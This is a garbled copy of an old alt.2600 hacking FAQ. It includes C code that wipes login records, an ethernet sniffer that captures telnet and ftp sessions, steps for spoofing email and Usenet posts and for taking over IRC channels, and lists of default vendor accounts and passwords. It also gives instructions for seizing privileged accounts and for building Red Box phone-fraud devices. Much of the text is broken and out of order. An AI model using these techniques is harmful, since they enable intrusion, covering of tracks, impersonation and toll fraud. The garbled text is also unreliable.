HACKING
"The 2600 Hacker Guide"

Section A: Computers

   01. How do I access the password file under Unix?
   02. How do I crack Unix passwords?
   03. What is password shadowing?
   04. Where can I find the password file if it's shadowed?
   05. What is NIS/yp?
   06. What are those weird characters after the comma in my passwd file?
   07. How do I access the password file under VMS?
   08. How do I crack VMS passwords?
   09. How do I break out of a restricted shell?
   10. How do I gain root from a suid script or program?
   11. How do I erase my presence from the system logs?
   12. How do I send fakemail?
   13. How do I fake posts to UseNet?
   14. How do I hack ChanOp on IRC?
   15. How do I modify the IRC client to hide my real username?
   16. How do I change to directories with strange characters in them?
   17. What is ethernet sniffing?
   18. What is an Internet Outdial?
   19. What are some Internet Outdials?
   20. What is this system?
   21. What are the default accounts for XXX ?
   22. What port is XXX on?
   23. What is a trojan/worm/virus/logic bomb?
   24. How can I protect myself from viruses and such?
   25. Where can I get more information about viruses?
   26. What is Cryptoxxxxxxx?
   27. What is PGP?
   28. What is Tempest?
   29. What is an anonymous remailer?
   30. What are the addresses of some anonymous remailers?
   31. How do I defeat copy protection?
   32. What is 127.0.0.1?
   33. How do I post to a moderated newsgroup?

Section B: Telephony

   01. What is a Red Box?
   02. How do I build a Red Box?
   03. Where can I get a 6.5536Mhz crystal?
   04. Which payphones will a Red Box work on?
   05. How do I make local calls with a Red Box?
   06. What is a Blue Box?
   07. Do Blue Boxes still work?
   08. What is a Black Box?
   09. What do all the colored boxes do?
   10. What is an ANAC number?
   11. What is the ANAC number for my area?
   12. What is a ringback number?
U  13. What is the ringback number for my area?
   14. What is a loop?
U  15. What is a loop in my area?
U  16. What is a CNA number?
U  17. What is the telephone company CNA number for my area?
U  18. What are some numbers that always ring busy?
U  19. What are some numbers that temporarily disconnect phone service?
U  20. What is scanning?
   21. Is scanning illegal?
   22. Where can I purchase a lineman's handset?
   23. What are the DTMF frequencies?
   24. What are the frequencies of the telephone tones?
   25. What are all of the * (LASS) codes?
   26. What frequencies do cordless phones operate on?
N  27. What is Caller-ID?
N  28. What is a PBX?
N  29. What is a VMB?

Section C: Resources

U  01. What are some ftp sites of interest to hackers?
N  02. What are some fsp sites of interest to hackers?
   03. What are some newsgroups of interest to hackers?
U  04. What are some telnet sites of interest to hackers?
   05. What are some gopher sites of interest to hackers?
U  06. What are some World wide Web (WWW) sites of interest to hackers?
U  07. What are some IRC channels of interest to hackers?
U  08. What are some BBS's of interest to hackers?
U  09. What are some books of interest to hackers?
N  10. What are some videos of interest to hackers?
U  11. What are some mailing lists of interest to hackers?
   12. What are some print magazines of interest to hackers?
N  13. What are some e-zines of interest to hackers?
   14. What are some organizations of interest to hackers?
U  15. Where can I purchase a magnetic stripe encoder/decoder?
   16. What are the rainbow books and how can I get them?

Section D: 2600

   01. What is alt.2600?
   02. What does "2600" mean?
   03. Are there on-line versions of 2600 available?
   04. I can't find 2600 at any bookstores. What can I do?
   05. Why does 2600 cost more to subscribe to than to buy at a newsstand?

Section E: Miscellaneous

U  01. What does XXX stand for?
   02. How do I determine if I have a valid credit card number?
   03. What bank issued this credit card?
U  04. What are the ethics of hacking?
   05. Where can I get a copy of the alt.2600/#hack FAQ?

U == Updated since last release of the alt.2600/#hack FAQ
N == New since last release of the alt.2600/#hack FAQ
    }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

    if ((pwd=getpwnam(who))!=NULL) {
        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }
    } else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
        printf("Error.\n");
}

12. How do I send fakemail?

Telnet to port 25 of the machine you want the mail to appear to originate from. Enter your message as in this example:

    HELO bellcore.com
    MAIL FROM:[email protected]
    RCPT TO:[email protected]
    DATA
    Please discontinue your silly Clipper initiative.
    .
    QUIT

On systems that have RFC 931 implemented, spoofing your "MAIL FROM:" line will not work. Test by sending yourself fakemail first.

For more information read RFC 822 "Standard for the format of ARPA Internet text messages."

13. How do I fake posts to UseNet?

Use inews to post. Give inews the following lines:

    From:
    Newsgroups:
    Subject:
    Message-ID:
    Date:
    Organization:

For a moderated newsgroup, inews will also require this line:

    Approved:

Then add your post and terminate with <Control-D>.

Example:

    From: Eric S. Real
    Newsgroups: alt.hackers
    Subject: Pathetic bunch of wannabe losers
    Message-ID: <[email protected]>
    Date: Fri, 13 Aug 1994 12:15:03
    Organization: Moral Majority

    A pathetic bunch of wannabe losers is what most of you are, with no right
    to steal the honorable title of `hacker' to puff up your silly adolescent egos.
    Get stuffed, get lost, and go to jail.

    Eric S. Real <[email protected]>

    ^D

Note that many systems will append an Originator: line to your message header, effectively revealing the account from which the message was posted.

14. How do I hack ChanOp on IRC?

Find a server that is split from the rest of IRC and create your own channel there using the name of the channel you want ChanOp on. When that server reconnects to the net, you will have ChanOp on the real channel. If you have ServerOp on a server, you can cause it to split on purpose.

15. How do I modify the IRC client to hide my real username?

Get the IRC client from cs.bu.edu /irc/clients. Look at the source code files irc.c and ctcp.c. The code you are looking for is fairly easy to spot. Change it. Change the username code in irc.c and the ctcp information code in ctcp.c. Compile and run your client.

Here are the diffs from a sample hack of the IRC client. Your client code
will vary slightly depending on what IRC client version you are running. ***
ctcp.c.old Wed Feb 10 10:08:05 1993 --- ctcp.c Fri Feb 12 04:33:55 1993
*************** *** 331,337 **** struct passwd *pwd; long diff; int uid; ! char c;
/* * sojge complained that ircII says 'idle 1 seconds' --- 331,337 ---struct
passwd *pwd; long diff; int uid; ! char c, *fing; /* * sojge complained that ircII
says 'idle 1 seconds' *************** *** 348,354 **** if (uid != DAEMON_UID)
{ #endif /* DAEMON_UID */ ! if (pwd = getpwuid(uid)) { char *tmp; --- 348,356 ---
if (uid != DAEMON_UID) { #endif /* DAEMON_UID */ ! if (fing = getenv("IRCFINGER"))
! send_ctcp_reply(from, ctcp->name, fing, diff, c); ! else if (pwd =
getpwuid(uid)) {
char
*tmp;
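Review bot: in the second ctcp.c hunk the string returned by getenv("IRCFINGER") goes to send_ctcp_reply() in the slot immediately before diff and c, which reads as the format-string position; if that is the case, any % conversion placed in the variable is expanded against those arguments or read past them. Pass a fixed format such as "%s" with fing as its argument, and give fing its own declaration instead of `char c, *fing;`.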
*** irc.c.old Wed Feb 10 06:33:11 1993 --- irc.c Fri Feb 12 04:02:11 1993
*************** *** 510,516 **** malloc_strcpy(&my_path, "/"); if (*realname ==
null(char)) strmcpy(realname, "*Unknown*", REALNAME_LEN); ! if (*username ==
null(char)) { if (ptr = getenv("USER")) strmcpy(username, ptr, NAME_LEN); ---
510,518 ---malloc_strcpy(&my_path, "/"); if (*realname == null(char))
strmcpy(realname, "*Unknown*", REALNAME_LEN); ! if (ptr = getenv("IRCUSER")) !
strmcpy(username, ptr, NAME_LEN); ! else if (*username == null(char)) { if (ptr =
getenv("USER")) strmcpy(username, ptr, NAME_LEN);

16. How do I change to directories with strange characters in them?

These directories are often used by people trying to hide information, most often warez (commercial software).

There are several things you can do to determine what these strange characters are. One is to use the arguments to the ls command that cause ls to give you more information:

From the man page for ls:

    -F  Causes directories to be marked with a trailing ``/'',
        executable files to be marked with a trailing ``*'', and
        symbolic links to be marked with a trailing ``@'' symbol.

    -q  Forces printing of non-graphic characters in filenames as
        the character ``?''.

    -b  Forces printing of non-graphic characters in the \ddd
        notation, in octal.

Perhaps the most useful tool is to simply do an "ls -al filename" to save the directory of the remote ftp site as a file on your local machine. Then you can do a "cat -t -v -e filename" to see exactly what those bizarre little characters are.

From the man page for cat:

    -v  Causes non-printing characters (with the exception of tabs,
        newlines, and form feeds) to be displayed. Control characters
        are displayed as ^X (<Ctrl>x), where X is the key pressed with
        the <Ctrl> key (for example, <Ctrl>m is displayed as ^M). The
        <Del> character (octal 0177) is printed as ^?. Non-ASCII
        characters (with the high bit set) are printed as M-x, where
        x is the character specified by the seven low order bits.

    -t  Causes tabs to be printed as ^I and form feeds as ^L. This
        option is ignored if the -v option is not specified.

    -e  Causes a ``$'' character to be printed at the end of each line
        (prior to the new-line). This option is ignored if the -v
        option is not set.

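
The notation described in the cat man page can also be applied to the names themselves. The following is an added example, not part of the original FAQ: it renders file names in that notation and flags the naming tricks this answer describes, for an administrator auditing an upload area or a saved "ls -al" listing. The function names, the reason labels and the sample listing are constructed for illustration, and tabs and newlines inside a name are always shown as ^I and ^J.

```python
import os

# Constructed sample: what a saved "ls -al" listing of an upload area might hold.
LISTING = (
    b"total 8\n"
    b"drwxr-xr-x  2 ftp  ftp  512 Aug 13  1994 pub\n"
    b"drwxrwxrwx  2 ftp  ftp  512 Aug 13  1994 ..\t\n"
    b"drwxrwxrwx  2 ftp  ftp  512 Aug 13  1994 .. \n"
    b"drwxrwxrwx  2 ftp  ftp  512 Aug 13  1994 \x1a\xff\n"
)


def cat_v(name: bytes) -> str:
    """Render raw file-name bytes in the `cat -v -t` notation quoted above."""
    out = []
    for b in name:
        prefix = ""
        if b >= 0x80:        # high bit set: "M-" followed by the low seven bits
            prefix, b = "M-", b & 0x7F
        if b < 0x20:         # control character: ^X (a tab becomes ^I)
            out.append(f"{prefix}^{chr(b + 0x40)}")
        elif b == 0x7F:      # <Del>, octal 0177
            out.append(f"{prefix}^?")
        else:
            out.append(prefix + chr(b))
    return "".join(out)


def reasons(name: bytes) -> list:
    """Return the reasons (possibly none) a name deserves a closer look."""
    found = []
    if any(b < 0x20 or b == 0x7F for b in name):
        found.append("control character")
    try:
        text = name.decode("utf-8")
    except UnicodeDecodeError:
        found.append("invalid UTF-8 bytes")
    else:
        # Ordinary accented names pass; no-break spaces and the like do not.
        if any(ord(c) >= 0x80 and not c.isprintable() for c in text):
            found.append("non-printing Unicode character")
    if name != name.strip(b" "):
        found.append("leading or trailing space")
    if name and name not in (b".", b"..") and set(name) <= set(b". \t"):
        found.append("looks like . or ..")
    return found


def scan_tree(root):
    """Walk root with bytes paths so undecodable names survive intact."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(os.fsencode(root)):
        for name in sorted(dirnames + filenames):
            why = reasons(name)
            if why:
                hits.append((os.fsdecode(dirpath), cat_v(name), why))
    return hits


def scan_listing(listing: bytes):
    """Check the name column of a saved `ls -al` listing (nine-field lines).

    Leading blanks in a name are lost when the line is split into fields;
    trailing blanks are kept because the split stops after eight fields.
    """
    hits = []
    for line in listing.split(b"\n"):
        fields = line.split(None, 8)
        if len(fields) == 9:
            why = reasons(fields[8])
            if why:
                hits.append((cat_v(fields[8]), why))
    return hits


if __name__ == "__main__":
    for shown, why in scan_listing(LISTING):
        print(f"{shown!r:12} {', '.join(why)}")
```
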
If the directory name includes a <SPACE> or a <TAB> you will need to enclose the entire directory name in quotes. Example:

    cd "..<TAB>"

On an IBM-PC, you may enter these special characters by holding down the <ALT> key and entering the decimal value of the special character on your numeric keypad. When you release the <ALT> key, the special character should appear on your screen. An ASCII chart can be very helpful.

Sometimes people will create directories with some of the standard stty control characters in them, such as ^Z (suspend) or ^C (intr). To get into those directories, you will first need to use stty to change the control character in question to another character.

From the man page for stty:

    Control assignments

    control-character C
        Sets control-character to C, where control-character is
        erase, kill, intr (interrupt), quit, eof, eol, swtch (switch),
        start, stop or susp.

        start and stop are available as possible control characters
        for the control-character C assignment.

        If C is preceded by a caret (^) (escaped from the shell),
        then the value used is the corresponding control character
        (for example, ^D is a <Ctrl>d; ^? is interpreted as DELETE
        and ^- is interpreted as undefined).

Use the stty -a command to see your current stty settings, and to determine which one is causing you problems.

17. What is ethernet sniffing?

Ethernet sniffing is listening (with software) to the raw ethernet device for packets that interest you. When your software sees a packet that fits certain criteria, it logs it to a file. The most common criterion for an interesting packet is that it contains words like "login" or "password."

Many ethernet sniffers are available; here are a few that may be on your system now:
OS ~~ HP/UX Irix SunOS Solaris DOS
& netfmt (display) /* Available via anonymous ftp /* Available via anonymous ftp
/* Available via anonymous ftp /* Available via anonymous ftp as /* ethld104.zip
/* Available via anonymous ftp
*/ */ */ */ */ */
Macintosh
Etherpeek
}
/* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen
- SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp
pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD ==
IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return;
{ register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) -
(TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF
* 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph-
>th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS,
TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) <
MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length,
"DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char
*)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN))
{ ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */
void death() { register struct CREC *CLe;
while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog
ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); }
/* opens network interface, performs ioctls and reads from it, * passing data to
filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len;
if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit
initialization code pinched from etherfind */ { struct strioctl si; struct ifreq
ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags =
NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open");
if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)");
si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl
(I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd =
NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout;
if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char
*)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR:
NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)&ifr;
if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char
*)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR:
NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl
(I_FLUSH)"); while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp =
buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp;
register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp +=
sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp-
>nhb_msglen);
} } Pexit((-1),"Eth: read"); }
*/ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf
ifc; int s, ac=1, backg=0; ProgName=argv[0];
/*
modem.uwyo.edu 35.1.1.6
Conclusion
----------
If you find any of the outdials to have gone dead, changed commands, or require password, please let us know so we can keep this list as accurate as possible. If you would like to add to the list, feel free to mail us and it will be included in future versions of this list, with your name beside it. Have fun...

[Editors note: Updates have been made to this document after the original publication]

20. What is this system?

AIX
~~~
IBM AIX Version 3 for RISC System/6000
(C) Copyrights by IBM and by others 1982, 1990.
login:

[You will know an AIX system because it is the only Unix system that]
[clears the screen and issues a login prompt near the bottom of the]
[screen]

AS/400
~~~~~~
UserID?
Password?

Once in, type GO MAIN

CDC Cyber
~~~~~~~~~
WELCOME TO THE NOS SOFTWARE SYSTEM.
COPYRIGHT CONTROL DATA 1978, 1987.

88/02/16. 02.36.53. N265100
CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
FAMILY:

You would normally just hit return at the family prompt. Next prompt is:

USER NAME:

CISCO Router
~~~~~~~~~~~~
FIRST BANK OF TNO
95-866 TNO VirtualBank
REMOTE Router - TN043R1

Console Port

SN - 00000866

TN043R1>

(CIERR 1424)

~~~
WELCOME TO CITIBANK. PLEASE SIGN ON.
XXXXXXXX

@
PASSWORD =

@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PLEASE ENTER YOUR ID:-1->
PLEASE ENTER YOUR PASSWORD:-2->

CITICORP (CITY NAME). KEY GHELP FOR HELP.
XXX.XXX
PLEASE SELECT SERVICE REQUIRED.-3->

Lantronix Terminal Server
~~~~~~~~~~~~~~~~~~~~~~~~~
Lantronix ETS16 Version V3.1/1(940623)

Type HELP at the 'Local_15> ' prompt for assistance.

Login password>

Meridian Mail (Northern Telecom Phone/Voice Mail System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ASCII-art banner: MERIDIAN]

Copyright (c) Northern Telecom, 1991

Novell ONLAN
~~~~~~~~~~~~
#N

[To access the systems it is best to own a copy of ONLAN/PC]

PC-Anywhere
~~~~~~~~~~~
#P

[To access the systems it is best to own a copy of PCAnywhere Remote]

PRIMOS
~~~~~~
PRIMENET 19.2.7F PPOA1

<any text>

ER!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CONNECT
Primenet V 2.3  (system)
LOGIN           (you)
User id?        (system)
SAPB5           (you)
Password?       (system)
DROWSAP         (you)
OK,             (system)

ROLM CBX II
~~~~~~~~~~~
ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568
BIND DATE: 7/APR/93
COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED.
ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.
YOU HAVE ENTERED CPU 1
12:38:47 ON WEDNESDAY 2/15/1995

USERNAME: op

PASSWORD:

INVALID USERNAME-PASSWORD PAIR

ROLM-OSL
~~~~~~~~
MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
RELEASE 8003
OSL, PLEASE.
?

System75
~~~~~~~~
Login: root
INCORRECT LOGIN

Login: browse
Password:

Software Version: G3s.b16.2.2

Terminal Type (513, 4410, 4425): [513]

Tops-10
~~~~~~~
NIH Timesharing

NIH Tri-SMP 7.02-FF 16:30:04 TTY11
system 1378/1381/1453 Connected to Node Happy(40) Line # 12
Please LOGIN
.

VM/370
~~~~~~
VM/370
!

VM/ESA
~~~~~~
VM/ESA ONLINE

TBVM2 VM/ESA Rel 1.1

Fill in your USERID and PASSWORD and press ENTER
(Your password will not appear when you type it)
USERID ===>
PASSWORD ===>

COMMAND ===>

PUT 9200
guest
HPUNSUP or SUPPORT or HP
MGR MGR MANAGER MGR FIELD MANAGER MGR PCUSER RSBCMON OPERATOR OPERATOR FIELD
OPERATOR MANAGER MAIL MANAGER MGR SYS MGE MGE MGR MGR
RJE ROBELLE SECURITY SECURITY SERVICE SYS SYS SYS SYS SYS SYSTEM SUPPORT SUPPORT
TCH TELESUP TELESUP TELESUP TELESUP VESOFT VESOFT WORD XLSERVER
Common jobs are Pub, Sys, Data Common passwords are HPOnly, TeleSup, HP, MPE,
Manager, MGR, Remote Major BBS ~~~~~~~~~ Sysop Mitel PBX ~~~~~~~~~ SYSTEM NeXTSTEP
~~~~~~~~ root signa
Sysop
NeXT signa
PhoneMail Defaults sysadmin tech poll RSX ~~~ SYSTEM/SYSTEM 1,1/system BATCH/BATCH
SYSTEM/MANAGER USER/USER sysadmin tech tech
Default accounts for Micro/RSX: MICRO/RSX

Alternately you can hit <CTRL-Z> when the boot sequence asks you for the date and create an account using:

    RUN ACNT
or  RUN $ACNT

(Numbers below 10 {oct} are Privileged)

Reboot and wait for the date/time question. Type ^C and at the MCR prompt, type "abo at." You must include the . dot!

If this works, type "acs lb0:/blks=1000" to get some swap space so the new step won't wedge.

Type "run $acnt" and change the password of any account with a group number of 7 or less.

You may find that the ^C does not work. Try ^Z and ESC as well. Also try all 3 as terminators to valid and invalid times.

If none of the above work, use the halt switch to halt the system, just after an invalid date-time. Look for a user mode PSW 1[4-7]xxxx. Then deposit 177777 into R6, cross your fingers, write protect the drive and continue the system. This will hopefully result in indirect blowing up... And
hopefully the system has not been fully secured. SGI Irix ~~~~~~~~ 4DGifts guest
demos lp nuucp tour tutor System 75 ~~~~~~~~~ bcim bciim bcms bcnas blue browse
craft cust enquiry field inads init kraft locate maint nms rcust support tech Taco
Bell ~~~~~~~~~ rgm tacobell
bcimpw bciimpw bcmspw, bcms bcnspw bluepw looker, browsepw crftpw, craftpw, crack
custpw enquirypw support indspw, inadspw, inads initpw kraftpw locatepw maintpw,
rwmaint nmspw rcustpw supportpw field
rollout <null>
Verifone Junior 2.05 ~~~~~~~~~~~~~~~~~~~~ Default password: 166816 VMS ~~~ field
systest
service utep
This FAQ answer was written by Theora:

Trojan:

Remember the Trojan Horse? Bad guys hid inside it until they could get into the city to do their evil deed. A trojan computer program is similar. It is a program which does an unauthorized function, hidden inside an authorized program. It does something other than what it claims to do, usually something malicious (although not necessarily!), and it is intended by the author to do whatever it does. If it's not intentional, it's called a 'bug' or, in some cases, a feature :) Some virus scanning programs detect some trojans. Some virus scanning programs don't detect any trojans. No virus scanners detect all trojans.

Virus:

A virus is an independent program which reproduces itself. It may attach to other programs, it may create copies of itself (as in companion viruses). It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space. Some virus scanners detect some viruses. No virus scanners detect all viruses. No virus scanner can protect against "any and all viruses, known and unknown, now and forevermore".

Worm:

Made famous by Robert Morris, Jr., worms are programs which reproduce by copying themselves over and over, system to system, using up resources and sometimes slowing down the systems. They are self contained and use the networks to spread, in much the same way viruses use files to spread. Some people say the solution to viruses and worms is to just not have any files or networks. They are probably correct. We would include computers.

Logic Bomb:

Code which will trigger a particular form of 'attack' when a designated condition is met. For instance, a logic bomb could delete all files on Dec. 5th. Unlike a virus, a logic bomb does not make copies of itself.

24. How can I protect myself from viruses and such?

02. How do I build a Red Box?

Red boxes are commonly manufactured from modified Radio Shack tone dialers, Hallmark greeting cards, or made from scratch from readily available electronic components.

To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer, open the dialer and replace the crystal with a new one. The purpose of the new crystal is to cause the * button on your tone dialer to create a 1700Mhz and 2200Mhz tone instead of the original 941Mhz and 1209Mhz tones. The exact value of the replacement crystal should be 6.466806 to create a perfect 1700Mhz tone and 6.513698 to create a perfect 2200mhz tone. A crystal close to those values will create a tone that easily falls within the loose tolerances of ACTS. The most popular choice is the 6.5536Mhz crystal, because it is the easiest to procure. The old crystal is the large shiny metal component labeled "3.579545Mhz." When you are finished replacing the crystal, program the P1 button with five *'s. That will simulate a quarter tone each time you press P1.

03. Where can I get a 6.5536Mhz crystal?

Your best bet is a local electronics store. Radio Shack sells them, but they are overpriced and the store must order them in. This takes approximately two weeks. In addition, many Radio Shack employees do not know that this can be done.

Or, you could order the crystal mail order. This introduces Shipping and Handling charges, which are usually much greater than the price of the crystal. It's best to get several people together to share the S&H cost. Or, buy five or six yourself and sell them later. Some of the places you can order crystals are:

    Digi-Key
    701 Brooks Avenue South
    P.O. Box 677
    Thief River Falls, MN 56701-0677
    (80)344-4539
    Part Number:X415-ND
    Part Number:X018-ND

    JDR Microdevices:
    2233 Branham Lane
    San Jose, CA 95124
    (800)538-5000
    Part Number: 6.5536MHZ

    Tandy Express Order Marketing
    401 NE 38th Street
    Fort Worth, TX 76106
    (800)241-8742
    Part Number: 10068625

    Alltronics
    2300 Zanker Road
    San Jose CA 95131
    (408)943-9774 Voice
    (408)943-9776 Fax
    (408)943-0622 BBS
    Part Number: 92A057

    Mouser
    (800)346-6873
    Part Number: 332-1066

04. Which payphones will a Red Box work on?

Red Boxes will work on TelCo owned payphones, but not on COCOT's (Customer Owned Coin Operated Telephones).

Red boxes work by fooling ACTS (Automated Coin Toll System) into believing you have put money into the pay phone. ACTS is the telephone company software responsible for saying "Please deposit XX cents" and listening for the coins being deposited.

COCOT's do not use ACTS. On a COCOT, the pay phone itself is responsible for determining what coins have been inserted.

05. How do I make local calls with a Red Box?

Payphones do not use ACTS for local calls. To use your red box for local calls, you have to fool ACTS into getting involved in the call.

One way to do this, in some areas, is by dialing 10288-xxx-xxxx. This makes your call a long distance call, and brings ACTS into the picture.

In other areas, you can call Directory Assistance and ask for the number of the person you are trying to reach. The operator will give you the number and then you will hear a message similar to "Your call can be completed automatically for an additional 35 cents." When this happens, you can then use ACTS tones.

06. What is a Blue Box?

Blue boxes use a 2600hz tone to seize control of telephone switches that use in-band signalling. The caller may then access special switch functions, with the usual purpose of making free long distance phone calls, using the tones provided by the Blue Box.

07. Do Blue Boxes still work?

Blue Boxes still work in areas using in band signalling. Modern phone switches use out of band signalling. Nothing you send over the voice portion of bandwidth can control the switch. If you are in an area served by a switch using out of band signalling, you can still blue box by calling through an area served by older in-band equipment.

08. What is a Black Box?

A Black Box is a 1.8k ohm resistor placed across your phone line to cause the phone company equipment to be unable to detect that you have answered your telephone. People who call you will then not be billed for the telephone call. Black boxes do not work under ESS.

09. What do all the colored boxes do?

Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
             Call Forwarding on old 4-wire phone systems
Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
Beige        Lineman's hand set
Black        Allows the calling party to not be billed for the call placed
Blast        Phone microphone amplifier
Blotto       Supposedly shorts every fone out in the immediate area
Blue         Emulate a true operator by seizing a trunk with a 2600hz tone
Brown        Create a party line from 2 phone lines
Bud          Tap into your neighbors phone line
Chartreuse   Use the electricity from your phone line
Cheese       Connect two phones to create a diverter
Chrome       Manipulate Traffic Signals by Remote Control
Clear        A telephone pickup coil and a small amp used to make free
             calls on Fortress Phones
Color        Line activated telephone recorder
Copper       Cause crosstalk interference on an extender
Crimson      Hold button
Dark         Re-route outgoing or incoming calls to another phone
Dayglo       Connect to your neighbors phone line
Divertor     Re-route outgoing or incoming calls to another phone
DLOC         Create a party line from 2 phone lines
Gold         Dialout router
Green        Emulate the Coin Collect, Coin Return, and Ringback tones
Infinity     Remotely activated phone tap
Jack         Touch-Tone key pad
Light        In-use light
Lunch        AM transmitter
Magenta      Connect a remote phone line to another remote phone line
Mauve        Phone tap without cutting into a line
Neon         External microphone
Noise        Create line noise
Olive        External ringer
Party        Create a party line from 2 phone lines
Pearl        Tone generator
Pink         Create a party line from 2 phone lines
Purple       Telephone hold button
Rainbow      Kill a trace by putting 120v into the phone line (joke)
Razz         Tap into your neighbors phone
Red          Make free phone calls from pay phones by generating
             quarter tones
Rock         Add music to your phone line
Scarlet      Cause a neighbors phone line to have poor reception
Silver       Create the DTMF tones for A, B, C and D
Static       Keep the voltage on a phone line high
Switch       Add hold, indicator lights, conferencing, etc..
Tan          Line activated telephone recorder
Tron         Reverse the phase of power to your house, causing your
             electric meter to run slower
TV Cable     "See" sound waves on your TV
Urine        Create a capacitative disturbance between the ring and
             tip wires in another's telephone headset
Violet       Keep a payphone from hanging up
White        Portable DTMF keypad
Yellow       Add an extension phone

10. What is an ANAC number?

An ANAC (Automatic Number Announcement Circuit) number is a telephone number that plays back the number of the telephone that called it. ANAC numbers are convenient if you want to know the telephone number of a pair of wires.

11. What is the ANAC number for my area?

How to find your ANAC number:

Look up your NPA (Area Code) and try the number listed for it. If that fails, try 1 plus the number listed for it. If that fails, try the common numbers like 311, 958 and 200-222-2222. If you find the ANAC number for your area, please let us know.

Note that many times the ANAC number will vary for different switches in the same city. The geographic naming on the list is NOT intended to be an accurate reference for coverage patterns, it is for convenience only.

Many companies operate 800 number services which will read back to you the number from which you are calling. Many of these require navigating a series of menus to get the phone number you are looking for.

   (800)238-4959   A voice mail system
   (800)328-2630   A phone sex line
   (800)568-3197   Info Access Telephone Company's Automated Blocking Line
   (800)571-8859   A phone sex line
   (800)692-6447   (800)MY-ANI-IS
N  (800)455-3256   Unknown

A non-800 ANAC that works nationwide is 404-988-9664. The one catch with this number is that it must be dialed with the AT&T Carrier Access Code 10732.

Another non-800 nationwide ANAC is Glen Robert of Full Disclosure Magazine's number, 10555-1-708-356-9646.

Please use local ANAC numbers if you can, as abuse or
overuse kills 800 ANAC numbers.

NPA  ANAC number     Geographic area
---  --------------  --------------------------------------------
201  958             Hackensack/Jersey City/Newark/Paterson, NJ
202  811             District of Columbia
203  970             CT
205  300-222-2222    Birmingham, AL
205  300-555-5555    Many small towns in AL
